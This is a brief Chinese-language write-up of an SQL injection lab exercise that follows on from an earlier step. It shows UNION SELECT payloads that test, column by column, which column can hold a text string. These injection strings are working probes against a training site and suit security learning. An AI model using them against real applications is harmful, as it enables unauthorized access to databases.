Web SQL injection Lab8

# Web SQL injection Lab8 本題是接續上題，我們找出了欄位數，接下來要找出哪個欄位可以放入文字，一樣先進入網站。需放入的文字為：`0hnJBB` ![image](https://hackmd.io/_uploads/Sk00nMVmgl.png) 先攔截請求並修改（已知欄位數為三）。 ``` %27%20UNION%20SELECT%20NULL,NULL,NULL-- ``` ![image](https://hackmd.io/_uploads/H1eelX4Xxg.png) 因為不知道哪個欄位可以放文字：`0hnJBB`，所以每個都試一遍，看哪個會成功。 ``` '+UNION+SELECT+'0hnJBB',NULL,NULL-- ``` ![image](https://hackmd.io/_uploads/SyCul7VQel.png) ``` '+UNION+SELECT+NULL,'0hnJBB',NULL-- ``` ![image](https://hackmd.io/_uploads/Syi8ZXEXlg.png)